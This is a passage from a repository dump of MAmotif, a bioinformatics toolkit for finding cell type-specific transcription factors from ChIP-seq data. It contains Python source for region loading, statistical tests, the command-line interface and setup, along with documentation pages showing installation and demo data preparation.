ValueError(f\"no matched MAnorm region found for: {self!r}\")\n\n def __repr__(self):\n return f\"GenomicRegion({self.chrom}:{self.start}-{self.end})\"\n\n\ndef load_mamotif_regions(f_manorm, f_motifscan):\n logger.info(\"Loading MAnorm result\")\n manorm_regions = load_motifscan_regions(f_manorm, 'manorm')\n logger.info(\"Loading MotifScan result\")\n logger.info(f\"Loading genomic regions from {f_motifscan} [motifscan]\")\n regions = []\n with open(f_motifscan, 'r') as fin:\n line = fin.readline()\n header = line.strip().split('\\t')\n if header[:3] != ['chr', 'start', 'end']:\n raise ValueError(\n \"not a valid MotifScan motif_sites_number.xls file\")\n motifs = header[3:]\n for line in fin:\n fields = line.strip().split('\\t')\n chrom = fields[0]\n start = int(fields[1]) - 1\n end = int(fields[2])\n n_sites = list(map(int, fields[3:]))\n region = MamotifRegion(chrom=chrom, start=start, end=end,\n n_sites=n_sites)\n regions.append(region)\n logger.info(f\"Loaded {len(regions)} genomic regions\")\n\n logger.info(\"Matching MAnorm and MotifScan results\")\n if len(manorm_regions) != len(regions):\n logger.warning(\"the number of genomic regions are unmatched!\")\n # group manorm regions by chrom to match with motifscan\n manorm_regions_by_chrom = {}\n for region in manorm_regions:\n manorm_regions_by_chrom.setdefault(region.chrom, [])\n manorm_regions_by_chrom[region.chrom].append(region)\n\n # find the matched manorm region and set the M value\n for region in regions:\n region.match_manorm(manorm_regions_by_chrom[region.chrom])\n return motifs, regions\n" }, { "alpha_fraction": 0.5299198031425476, "alphanum_fraction": 0.5373226404190063, "avg_line_length": 27.438596725463867, "blob_id": "3b98d5600444d2c702cb4272518131356e732e59", "content_id": "a919b7ca936ead905316da9ec7761118a3d9a6e6", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1621, "license_type": "permissive", "max_line_length": 69, "num_lines": 57, "path": "/mamotif/stats.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.stats\n-------------\n\nStatistical functions used in MAmotif.\n\"\"\"\n\nimport numpy as np\nfrom scipy import stats\n\n\ndef mamotif_t_test(m_values_pos, m_values_neg):\n try:\n t_stat, p_value = stats.ttest_ind(m_values_pos, m_values_neg,\n equal_var=False)\n if t_stat < 0:\n p_right = 1 - p_value / 2\n else:\n p_right = p_value / 2\n return t_stat, p_right\n except:\n return np.nan, np.nan\n\n\ndef mamotif_ranksum_test(m_values_pos, m_values_neg):\n try:\n z_stat, p_value = stats.ranksums(m_values_pos, m_values_neg)\n if z_stat < 0:\n p_right = 1 - p_value / 2\n else:\n p_right = p_value / 2\n return z_stat, p_right\n except:\n return np.nan, np.nan\n\n\ndef adjust_p_values(p_values, correction='benjamin'):\n n = len(p_values)\n adjusted_p_values = []\n if correction == 'benjamin':\n order = np.argsort(p_values)\n ranks = np.empty_like(order)\n ranks[order] = np.arange(1, n + 1)\n for p_value, rank in zip(p_values, ranks):\n if np.isnan(p_value):\n adjusted_p_values.append(np.nan)\n else:\n adjusted_p_values.append(min(1, p_value * n / rank))\n elif correction == 'bonferroni':\n for p_value in p_values:\n if np.isnan(p_value):\n adjusted_p_values.append(np.nan)\n else:\n adjusted_p_values.append(min(1, p_value * n))\n else:\n raise ValueError(f\"invalid correction type: {correction}\")\n return adjusted_p_values\n" }, { "alpha_fraction": 0.6131538152694702, "alphanum_fraction": 0.7193164229393005, "avg_line_length": 33.48214340209961, "blob_id": "c2edfce7695bf5369460d8fd84f380377de5d0e2", "content_id": "1daac0e715692cf0e028761794372ebe01328d82", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1931, "license_type": "permissive", "max_line_length": 190, "num_lines": 56, "path": "/docs/source/demo.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _demo:\n\nExample Usage\n=============\n\nHere we provide a step-by-step instruction on how to use MAmotif to find candidate\ncell-type specific regulators associated with certain histone modifications.\n\nWe take the H3K4me3 analysis between adult and fetal ProES in the MAmotif\npaper as an example:\n\n1. Install MAmotif::\n\n $pip install mamotif\n $conda install -c bioconda mamotif\n\n2. Download example data files::\n\n $mkdir MAmotif_demo\n $cd MAmotif_demo\n $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908038/suppl/GSM908038_H3K4me3-F_peaks.bed.gz\n $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908039/suppl/GSM908039_H3K4me3-A_peaks.bed.gz\n $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908038/suppl/GSM908038_H3K4me3-F.bed.gz\n $wget ftp://ftp.ncbi.nlm.nih.gov/geo/samples/GSM908nnn/GSM908039/suppl/GSM908039_H3K4me3-A.bed.gz\n $gzip -d *gz\n\n Remove the header line and ribosomal reads\n $sed -i '1d' GSM908038_H3K4me3-F.bed\n $sed -i '1d' GSM908039_H3K4me3-A.bed\n $sed -i '8986927,$d' GSM908038_H3K4me3-F.bed\n $sed -i '14916308,$d' GSM908039_H3K4me3-A.bed\n\n Substitute space into tab for bed files\n $sed -i \"s/ /\\t/g\" GSM908038_H3K4me3-F.bed\n $sed -i \"s/ /\\t/g\" GSM908039_H3K4me3-A.bed\n\n.. note::\n\n The modification steps of data files above is specific to the example,\n since the format does not follow the standard. You do not have to do this\n for your own data.\n\n\n3. Install genome `hg18` from UCSC database::\n\n $ motifscan genome --install -n hg18 -r hg18\n\n4. Install motif PFMs set from JASPAR database::\n\n $ motifscan motif --install -n vertebrates -r vertebrates_non-redundant -g hg19\n\n5. Run MAmotif::\n\n $mamotif run --p1 GSM908039_H3K4me3-A_peaks.bed --p2 GSM908038_H3K4me3-F_peaks.bed --r1 GSM908039_H3K4me3-A.bed --r2 GSM908038_H3K4me3-F.bed -g hg18 -m vertebrates -o AvsF_H3K4me3_MAmotif\n\n6. Check the output of MAmotif\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5862069129943848, "avg_line_length": 8.666666984558105, "blob_id": "b3f60c17751eb2ff631971c115c627564a4a9e45", "content_id": "bf7a88bd1abce2867bbabcafafc100bcb9657d05", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "permissive", "max_line_length": 21, "num_lines": 6, "path": "/tests/test_cli.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "def test_run():\n pass\n\n\ndef test_integrate():\n pass\n" }, { "alpha_fraction": 0.6044444441795349, "alphanum_fraction": 0.6044444441795349, "avg_line_length": 10.25, "blob_id": "5f286148e3e3b0a64ba2688bb050d93d6a04616e", "content_id": "6b6a7ffe8f468a6ee3434d7642ef155bf3606794", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 225, "license_type": "permissive", "max_line_length": 50, "num_lines": 20, "path": "/docs/source/contact.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _contact:\n\nContact\n=======\n\n\nGitHub Issue\n------------\n\nWelcome to ask questions or report bugs on GitHub:\n\nhttps://github.com/shao-lab/MAmotif/issues\n\nEmail\n-----\n\nPlease contact:\n\n * Hongduo Sun ([email protected])\n * Zhen Shao ([email protected])\n" }, { "alpha_fraction": 0.5956258773803711, "alphanum_fraction": 0.6123778223991394, "avg_line_length": 28.84722137451172, "blob_id": "24c5ebd076608239c0084dd297c61c1f117bca80", "content_id": "5ab8ddb2218e3f3ce587073a81738d0304447a1b", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2149, "license_type": "permissive", "max_line_length": 74, "num_lines": 72, "path": "/setup.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport sys\n\nfrom setuptools import find_packages, setup\n\npy_version = sys.version_info[:2]\nif py_version < (3, 6):\n raise RuntimeError(\"MAmotif requires Python 3.6+ to install!\")\n\ndescription = \"An integrative toolkit for detecting cell type-specific \" \\\n \"regulators\"\n\npkg_dir = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(pkg_dir, 'mamotif', '__init__.py')) as fin:\n version = re.search(r\"__version__ = '(.*?)'\", fin.read()).group(1)\n\nwith open(os.path.join(pkg_dir, 'README.rst')) as fin:\n long_description = fin.read()\n\ninstall_requires = [\n \"numpy>=1.15\",\n \"scipy>=1.0\",\n \"MAnorm>=1.3.0\",\n \"motifscan>=1.2.0\"\n]\n\nextras_require = {\n \"test\": [\"pytest>=4.0.0\",\n \"pytest-cov>=2.8.0\"],\n \"docs\": [\"sphinx>=2.0.0\",\n \"sphinx_rtd_theme\"]\n}\n\nclassifiers = [\n \"Development Status :: 5 - Production/Stable\",\n 'Environment :: Console',\n 'Intended Audience :: Science/Research',\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: Unix\",\n \"Operating System :: POSIX\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\"\n]\n\nsetup(name=\"MAmotif\",\n version=version,\n description=description,\n long_description=long_description,\n url=\"https://github.com/shao-lab/MAmotif\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/shao-lab/MAmotif/issues\",\n \"Documentation\": \"https://mamotif.readthedocs.io\",\n \"Source Code\": \"https://github.com/shao-lab/MAmotif\",\n },\n author=\"Hayden Sun\",\n author_email=\"[email protected]\",\n license='BSD',\n packages=find_packages(),\n entry_points={\"console_scripts\": [\"mamotif=mamotif.cli.main:main\"]},\n python_requires=\">=3.6\",\n install_requires=install_requires,\n extras_require=extras_require,\n classifiers=classifiers,\n zip_safe=False,\n )\n" }, { "alpha_fraction": 0.7300150990486145, "alphanum_fraction": 0.7300150990486145, "avg_line_length": 30.571428298950195, "blob_id": "3be9e14370de314cae49a4442a3d1895b9055658", "content_id": "864664decd50a36a55223c676e2cef1671a8abe0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "permissive", "max_line_length": 69, "num_lines": 21, "path": "/mamotif/cli/intergrate.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.integrate\n---------------------\n\nIntegrate MAnorm and MotifScan results to run MAmoitf.\n\"\"\"\n\nfrom manorm.logging import setup_logger as setup_manorm_logger\nfrom motifscan.logging import setup_logger as setup_motifscan_logger\n\nfrom mamotif.integration import run_integration\n\n\ndef run(args):\n setup_manorm_logger(args.verbose)\n setup_motifscan_logger(args.verbose)\n run_integration(\n f_manorm=args.f_manorm, f_motifscan=args.f_motifscan,\n negative=args.negative, genome=args.genome, split=args.split,\n upstream=args.upstream, downstream=args.downstream,\n correction=args.correction, output_dir=args.output_dir)\n" }, { "alpha_fraction": 0.7276058793067932, "alphanum_fraction": 0.740227997303009, "avg_line_length": 36.75384521484375, "blob_id": "26fe50bd5a803fb1431fa6287f8bcad1939d4ef0", "content_id": "6994d95e7a5aeeda69df57ed585ed032c44e4610", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2456, "license_type": "permissive", "max_line_length": 130, "num_lines": 65, "path": "/README.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "MAmotif\n=======\n\n|Documentation Status| |pypi| |license|\n\n.. |Documentation Status| image:: https://readthedocs.org/projects/mamotif/badge/?version=latest\n :target: https://mamotif.readthedocs.io/en/latest/?badge=latest\n.. |pypi| image:: https://img.shields.io/pypi/v/mamotif.svg\n :target: https://pypi.org/project/MAmotif/\n.. |license| image:: https://img.shields.io/pypi/l/MAmotif.svg\n :target: https://github.com/shao-lab/MAmotif/blob/master/LICENSE\n\nIntroduction\n------------\n\n**MAmotif** is used to compare two ChIP-seq samples of the same protein from different cell types or conditions\n(e.g. Mutant vs Wild-type) and **identify transcriptional factors (TFs) associated with the cell-type biased binding**\nof this protein as its **co-factors**, by using TF binding information obtained from motif analysis\n(or from other ChIP-seq data).\n\nMAmotif automatically combines **MAnorm** model to perform quantitative comparison on given ChIP-seq samples together\nwith Motif-Scan toolkit to scan ChIP-seq peaks for **TF binding motifs**, and uses a systematic integrative analysis to\nsearch for TFs whose binding sites are significantly associated with the cell-type biased peaks between two ChIP-seq samples.\n\nWhen applying to ChIP-seq data of histone marks of regulatory elements (such as H3K4me3 for active promoters and\nH3K9/27ac for active promoter/enhancers), or DNase/ATAC-seq data, MAmotif can be used to detect **cell-type specific regulators**.\n\nWorkflow\n--------\n\n.. image:: https://github.com/shao-lab/MAmotif/blob/master/docs/source/image/MAmotif_workflow.png\n\nCitation\n--------\n\n`Sun H, Wang J, Gong Z, Yao J, Wang Y, Xu J, Yuan GC, Zhang Y, Shao Z. Quantitative integration of epigenomic variation\nand transcription factor binding using MAmotif toolkit identifies an important role of IRF2 as transcription activator\nat gene promoters. Cell discovery. 2018 Jul 10;4(1):38. <https://www.nature.com/articles/s41421-018-0045-y>`__\n\nInstallation\n------------\n\nThe latest release of MAmotif is available at `PyPI <https://pypi.org/project/MAmotif/>`__:\n\n.. code-block:: shell\n\n $ pip install mamotif\n\nOr you can install MAmotif via conda:\n\n.. code-block:: shell\n\n $ conda install -c bioconda mamotif\n\n\nDocumentation\n-------------\n\nTo see the full documentation of MAmotif, please refer to: http://mamotif.readthedocs.io/en/latest/\n\nLicense\n-------\n\n`BSD 3-Clause\nLicense <https://github.com/shao-lab/MAmotif/blob/master/LICENSE>`__\n\n\n" }, { "alpha_fraction": 0.7284210324287415, "alphanum_fraction": 0.7291228175163269, "avg_line_length": 29.319149017333984, "blob_id": "9bcf26bc6bdc32ec4a1275b94a9a3c0f1a47dfd4", "content_id": "5589e30c1b4afdc7b927b41f4c99eaeacd05db33", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1425, "license_type": "permissive", "max_line_length": 124, "num_lines": 47, "path": "/docs/source/index.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "MAmotif\n=======\n\n.. image:: https://readthedocs.org/projects/mamotif/badge/?version=latest\n :alt: Documentation Status\n :target: https://mamotif.readthedocs.io/en/latest/?badge=latest\n.. image:: https://img.shields.io/pypi/v/mamotif.svg\n :alt: PyPI\n :target: https://pypi.org/project/MAmotif/\n.. image:: https://img.shields.io/pypi/l/MAmotif.svg\n :alt: License\n :target: https://github.com/shao-lab/MAmotif/blob/master/LICENSE\n\n**MAmotif** is an integrative toolkit for searching cell type-specific co-factors associated with differential binding.\n\nFeatures\n--------\n\n- Quantitatively compare ChIP-Seq samples by robust linear regression on common protein binding sites(peaks) (MAnorm model)\n- Scan for motif target sites and perform motif enrichment analysis on genomic regions\n- Identify transcriptional factors (TFs) associated with the cell-type differential binding\n- Search for candidate cell-type specific regulators\n\n\nContents\n--------\n\n.. toctree::\n :maxdepth: 2\n\n intro\n tutorial\n demo\n changelog\n faq\n license\n contact\n\n---------------\n\nThe Python version of MAmotif is developed by ShaoLab_ at `CAS-MPG Partner Institute for Computational Biology, SIBS, CAS`_.\n\n.. seealso::\n GitHub repository of MAmotif: https://github.com/shao-lab/MAmotif\n\n.. _ShaoLab: http://bioinfo.sibs.ac.cn/shaolab/\n.. _CAS-MPG Partner Institute for Computational Biology, SIBS, CAS: https://www.picb.ac.cn/\n" }, { "alpha_fraction": 0.6357472538948059, "alphanum_fraction": 0.6457293629646301, "avg_line_length": 40, "blob_id": "13122b6511728b6d1042c6950cd3df0ea6faad00", "content_id": "c43e5af12579d78c975693d059c0f31f421f58cc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10619, "license_type": "permissive", "max_line_length": 95, "num_lines": 259, "path": "/mamotif/cli/main.py", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": "\"\"\"\nmamotif.cli.main\n----------------\n\nMain command line interface of MAmotif.\n\"\"\"\n\nimport argparse\nimport os\nfrom textwrap import dedent\n\nfrom manorm.read import READ_FORMATS\nfrom manorm.region import REGION_FORMATS\n\nfrom mamotif import __version__\nfrom mamotif.cli import intergrate, run\nfrom mamotif.logging import setup_logger\n\n\ndef _existed_file(path):\n \"\"\"Check whether a passed argument is an existed file.\"\"\"\n if not os.path.isfile(path):\n raise argparse.ArgumentTypeError(f\"file not found: {path}\")\n return path\n\n\ndef _pos_int(value):\n \"\"\"Check whether a passed argument is a positive integer.\"\"\"\n try:\n value_int = int(value)\n if value_int <= 0:\n raise ValueError\n except (ValueError, TypeError):\n raise argparse.ArgumentTypeError(\n f\"invalid positive int value: {value!r}\")\n return value_int\n\n\ndef _add_verbose_argument(parser):\n parser.add_argument(\n \"--verbose\", dest=\"verbose\", action=\"store_true\", default=False,\n help=\"Enable verbose log messages.\")\n return parser\n\n\ndef add_mamotif_arguments(parser):\n parser_integrate = parser.add_argument_group(\"Integration Options\")\n parser_integrate.add_argument(\n \"--split\", dest=\"split\", action=\"store_true\", default=False,\n help=\"Split genomic regions into promoter/distal regions and run \"\n \"separately.\")\n parser_integrate.add_argument(\n \"--upstream\", metavar=\"DISTANCE\", dest=\"upstream\",\n type=_pos_int, default=4000,\n help=\"TSS upstream distance for promoters. Default: 4000\")\n parser_integrate.add_argument(\n \"--downstream\", metavar=\"DISTANCE\", dest=\"downstream\",\n type=_pos_int, default=2000,\n help=\"TSS downstream distance for promoters. Default: 2000\")\n parser_integrate.add_argument(\n \"--correction\", dest=\"correction\", choices=[\"benjamin\", \"bonferroni\"],\n default=\"benjamin\",\n help=\"Method for multiple testing correction. Default: benjamin\")\n parser_output = parser.add_argument_group(\"Output Options\")\n parser_output.add_argument(\n \"-o\", \"--output-dir\", metavar=\"DIR\", dest=\"output_dir\", required=True,\n help=\"Directory to write output files.\")\n return parser\n\n\ndef configure_parser_run(subparsers):\n help_msg = \"Run complete workflow (MAnorm + MotifScan + Integration).\"\n desc_msg = help_msg + dedent(\"\"\"\n\n Run the complete MAmotif workflow with basic MAnorm/MotifScan options.\n If you want to control other advanced options (MAnorm normalization \n options or MotifScan scanning options), please run them independently and\n call MAmotif integration module with the `mamotif integrate` sub-command.\n \"\"\")\n epilog_msg = dedent(\"\"\"\n Notes:\n ------\n Before running MAmotif, the MotifScan genome/motif data files should be \n configured in advance. Please refer to the documentation for more \n information. \n \"\"\")\n parser = subparsers.add_parser(\n \"run\", description=desc_msg, help=help_msg, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser_input = parser.add_argument_group(\"Input Options\")\n parser_input.add_argument(\n \"--p1\", \"--peak1\", metavar=\"FILE\", dest=\"peak_file1\", required=True,\n type=_existed_file, help=\"Peak file of sample A.\")\n parser_input.add_argument(\n \"--p2\", \"--peak2\", metavar=\"FILE\", dest=\"peak_file2\", required=True,\n type=_existed_file, help=\"Peak file of sample B.\")\n parser_input.add_argument(\n \"--pf\", \"--peak-format\", metavar=\"FORMAT\", dest=\"peak_format\",\n choices=REGION_FORMATS, default=\"bed\",\n help=f\"Format of the peak files. Support {REGION_FORMATS}. \"\n f\"Default: bed\")\n parser_input.add_argument(\n \"--r1\", \"--read1\", metavar=\"FILE\", dest=\"read_file1\", required=True,\n type=_existed_file, help=\"Read file of sample A.\")\n parser_input.add_argument(\n \"--r2\", \"--read2\", metavar=\"FILE\", dest=\"read_file2\", required=True,\n type=_existed_file, help=\"Read file of sample B.\")\n parser_input.add_argument(\n \"--rf\", \"--read-format\", metavar=\"FORMAT\", dest=\"read_format\",\n choices=READ_FORMATS, default=\"bed\",\n help=f\"Format of the read files. Support {READ_FORMATS}. Default: bed\")\n parser_input.add_argument(\n \"--n1\", \"--name1\", metavar=\"NAME\", dest=\"name1\",\n help=\"Name of sample A. If not specified, the peak file name will be \"\n \"used.\")\n parser_input.add_argument(\n \"--n2\", \"--name2\", metavar=\"NAME\", dest=\"name2\",\n help=\"Name of sample B. If not specified, the peak file name will be \"\n \"used.\")\n\n parser_input.add_argument(\n \"-m\", \"--motif\", metavar=\"NAME\", dest=\"motif\", required=True,\n help=\"Motif set name to scan for.\")\n parser_input.add_argument(\n \"-g\", \"--genome\", metavar=\"GENOME\", dest=\"genome\", required=True,\n help=\"Genome assembly name.\")\n\n parser_reads = parser.add_argument_group(\"MAnorm Options\")\n parser_reads.add_argument(\n \"--s1\", \"--shiftsize1\", metavar=\"N\", dest=\"shift_size1\",\n type=int, default=100,\n help=\"Single-end reads shift size for sample A. Reads are shifted by \"\n \"`N` bp towards 3' direction and the 5' end of each shifted read \"\n \"is used to represent the genomic locus of the DNA fragment. \"\n \"Set to 0.5 * fragment size of the ChIP-seq library. \"\n \"Default: 100\")\n parser_reads.add_argument(\n \"--s2\", \"--shiftsize2\", metavar=\"N\", dest=\"shift_size2\",\n type=int, default=100,\n help=\"Single-end reads shift size for sample B. Default: 100\")\n parser_reads.add_argument(\n \"--pe\", \"--paired-end\", dest=\"paired\", action='store_true',\n default=False,\n help=\"Paired-end mode. The middle point of each read pair is used to \"\n \"represent the genomic locus of the DNA fragment. If specified, \"\n \"`--s1` and `--s2` will be ignored.\")\n\n parser_motifscan = parser.add_argument_group(\"MotifScan Options\")\n parser_motifscan.add_argument(\n \"-p\", dest=\"p_value\", default=\"1e-4\",\n choices=[\"1e-2\", \"1e-3\", \"1e-4\", \"1e-5\", \"1e-6\"],\n help=\"P value cutoff for motif scores. Default: 1e-4\")\n parser_motifscan.add_argument(\n \"-t\", \"--threads\", metavar=\"N\", dest=\"n_threads\", type=int, default=1,\n help=\"Number of processes used to run in parallel.\")\n parser_mamotif = parser.add_argument_group(\"MAmotif Options\")\n parser_mamotif.add_argument(\n \"--mode\", dest=\"mode\", choices=['both', 'A', 'B'], default='both',\n help=\"Which sample to perform MAmotif on. Default: both\")\n parser = add_mamotif_arguments(parser)\n parser = _add_verbose_argument(parser)\n parser.set_defaults(func=run.run)\n\n\ndef configure_parser_integrate(subparsers):\n help_msg = \"Run the integration module with MAnorm and MotifScan results.\"\n desc_msg = help_msg + dedent(\"\"\"\n\n This command is used when users have already got the MAnorm and MotifScan \n results, and only run the final integration procedure.\n \"\"\")\n epilog_msg = dedent(\"\"\"\n Examples:\n ---------\n Suppose you have the MAnorm result (sample A vs sample B), and the \n MotifScan results for both samples:\n \n 1) Find cell type-specific co-factors for sample A:\n \n mamotif integrate -i A_MAvalues.xls -m A_motifscan/motif_sites_numbers.xls -o <path>\n \n 2) Convert M=log2(A/B) to -M=log2(B/A) and find co-factors for sample B:\n \n mamotif integrate -i B_MAvalues.xls -m B_motifscan/motif_sites_numbers.xls -n -o <path>\n \n \"\"\")\n parser = subparsers.add_parser(\n \"integrate\", description=desc_msg, help=help_msg, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n parser_input = parser.add_argument_group(\"Input Options\")\n parser_input.add_argument(\n \"-i\", metavar=\"FILE\", dest=\"f_manorm\", required=True,\n help=\"MAnorm result for sample A or B (A/B_MAvalues.xls).\")\n parser_input.add_argument(\n \"-m\", metavar=\"FILE\", dest=\"f_motifscan\", required=True,\n help=\"MotifScan result for sample A or B (motif_sites_number.xls).\")\n parser_input.add_argument(\n \"-n\", \"--negative\", dest=\"negative\", action=\"store_true\",\n default=False,\n help=\"Convert M=log2(A/B) to -M=log2(B/A). Required when finding \"\n \"co-factors for sample B.\")\n parser_input.add_argument(\n \"-g\", dest=\"genome\", default=None,\n help=\"Genome name. Required if `--split` is enabled.\")\n parser = add_mamotif_arguments(parser)\n parser = _add_verbose_argument(parser)\n parser.set_defaults(func=intergrate.run)\n\n\ndef configure_parser_main():\n \"\"\"Configure the arguments parsers for MAmotif.\"\"\"\n description = dedent(\"\"\"\n MAmotif: An integrative toolkit for detecting cell type-specific regulators\n \n MAmotif is used to compare two ChIP-seq samples of the same protein from \n different cell types (or conditions, e.g. wild-type vs mutant) and \n identify transcriptional factors (TFs) associated with the cell type-biased \n binding of this protein as its co-factors, by using TF binding information \n obtained from motif analysis.\n \n Citation:\n Sun, H., Wang, J., Gong, Z. et al. Quantitative integration of epigenomic\n variation and transcription factor binding using MAmotif toolkit identifies\n an important role of IRF2 as transcription activator at gene promoters.\n Cell Discov 4, 38 (2018). https://doi.org/10.1038/s41421-018-0045-y\n \"\"\")\n\n epilog_msg = dedent(\"\"\"\n Please run `mamotif COMMAND -h` to see the subcommand options.\n\n See also:\n Documentation: https://mamotif.readthedocs.io\n Source code: https://github.com/shao-lab/MAmotif\n Bug reports: https://github.com/shao-lab/MAmotif/issues\n \"\"\")\n\n parser = argparse.ArgumentParser(\n description=description, epilog=epilog_msg,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-v\", \"--version\", action=\"version\",\n version=f\"MAmotif {__version__}\")\n\n subparsers = parser.add_subparsers(title=\"MAmotif Subcommands\",\n metavar=\"command\", dest=\"cmd\")\n configure_parser_run(subparsers)\n configure_parser_integrate(subparsers)\n return parser\n\n\ndef main():\n parser = configure_parser_main()\n args = parser.parse_args()\n setup_logger(args.verbose)\n args.func(args)\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7689429521560669, "alphanum_fraction": 0.7754911184310913, "avg_line_length": 49.904762268066406, "blob_id": "2b24417478bf92aae1ccec6099230badef72b664", "content_id": "ac15d57f362dfeea38a8a4c9b0698cedbac34812", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1069, "license_type": "permissive", "max_line_length": 130, "num_lines": 21, "path": "/docs/source/intro.rst", "repo_name": "shao-lab/MAmotif", "src_encoding": "UTF-8", "text": ".. _intro:\n\nIntroduction\n------------\n\n**MAmotif** is used to compare two ChIP-seq samples of the same protein from different cell types or conditions\n(e.g. Mutant vs Wild-type) and **identify transcriptional factors (TFs) associated with the cell-type biased binding**\nof this protein as its **co-factors**, by using TF binding information obtained from motif analysis\n(or from other ChIP-seq data).\n\nMAmotif automatically combines **MAnorm** model to perform quantitative comparison on given ChIP-seq samples together\nwith Motif-Scan toolkit to scan ChIP-seq peaks for **TF binding motifs**, and uses a systematic integrative analysis to\nsearch for TFs whose binding sites are significantly associated with the cell-type biased peaks between two ChIP-seq samples.\n\nWhen applying to ChIP-seq data of histone marks of regulatory elements (such as H3K4me3 for active promoters and\nH3K9/27ac for active promoter/enhancers), or DNase/ATAC-seq data, MAmotif can be used to detect **cell-type specific regulators**.\n\nWorkflow\n--------\n\n.. image:: image/MAmotif_workflow.png\n" } ]
16
AdamMagoon/FlaskBrowserGUI
https://github.com/AdamMagoon/FlaskBrowserGUI
c9cbca3100482672ddf32a2309fa67a1c7826330
308d150fe620a792978d202adb9072e40dac56e3
d29c263b3e9f22bd98b384bf5fe49df37c96f6f9
refs/heads/master
2021-01-13T00:44:43.049983
2015-12-20T00:52:39
2015-12-20T00:52:39
48,258,038
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6196708679199219, "alphanum_fraction": 0.622521698474884, "avg_line_length": 27.371322631835938, "blob_id": "503ba828c2e1305546909bc7aab29ee5f880a935", "content_id": "bc35f7c621f0a9438d28183d1162a8779db19db1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7717, "license_type": "no_license", "max_line_length": 104, "num_lines": 272, "path": "/main.py", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "import hashlib as h\nimport sqlalchemy\nfrom os import getenv\nfrom socket import gethostname\nfrom werkzeug.utils import redirect\nfrom wtforms import Form, validators, StringField, HiddenField, SubmitField\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, create_engine, ForeignKey\nfrom sqlalchemy.orm import sessionmaker, relationship, backref\nfrom flask import Flask, render_template, request, flash, url_for\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///local_db.sqlite', echo=False)\nBase = declarative_base()\n\n\nclass User(Base):\n \"\"\"\n Session and data storage for users\n \"\"\"\n __tablename__ = 'users'\n\n id = Column(Integer, primary_key=True)\n hostname = Column(String)\n u_name = Column(String)\n\n files = relationship('File', backref='users')\n directories = relationship('Directory', backref='users')\n\n def __repr__(self):\n return \"<User(hostname={}, u_name={}, files={})>\".format(self.hostname, self.u_name, self.files)\n\n\nclass File(Base):\n \"\"\"\n Child table for Users.\n\n Stores file information such as:\n - File check_sums\n - File paths\n \"\"\"\n __tablename__ = 'files'\n\n id = Column(Integer, primary_key=True)\n file_path = Column(String)\n check_sum = Column(String)\n\n user_id = Column(Integer, ForeignKey('users.id'))\n\n def __repr__(self):\n return \"<File(file_path={})>\".format(self.file_path)\n\n\nclass Directory(Base):\n __tablename__ = 'dirs'\n\n id = Column(Integer, primary_key=True)\n dir_path = Column(String)\n\n user_id = Column(Integer, ForeignKey('users.id'))\n\n def __repr__(self):\n return \"<Directory(dir_path={}, files={})>\".format(self.dir_path, self.files)\n\n\n# Initialize SQL Tables and make connection to database\nBase.metadata.create_all(engine)\n# Session is the database communicator\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\nclass AddFile(Form):\n new_file = StringField('New File', [validators.DataRequired()])\n\n\nclass DeleteFile(Form):\n # del_file = SubmitField('Delete')\n del_file = HiddenField('del_value')\n\n\nclass HandleFile(Form):\n del_value = HiddenField('del_value')\n clicked = HiddenField('clicked')\n path = HiddenField('path')\n new_checksum = 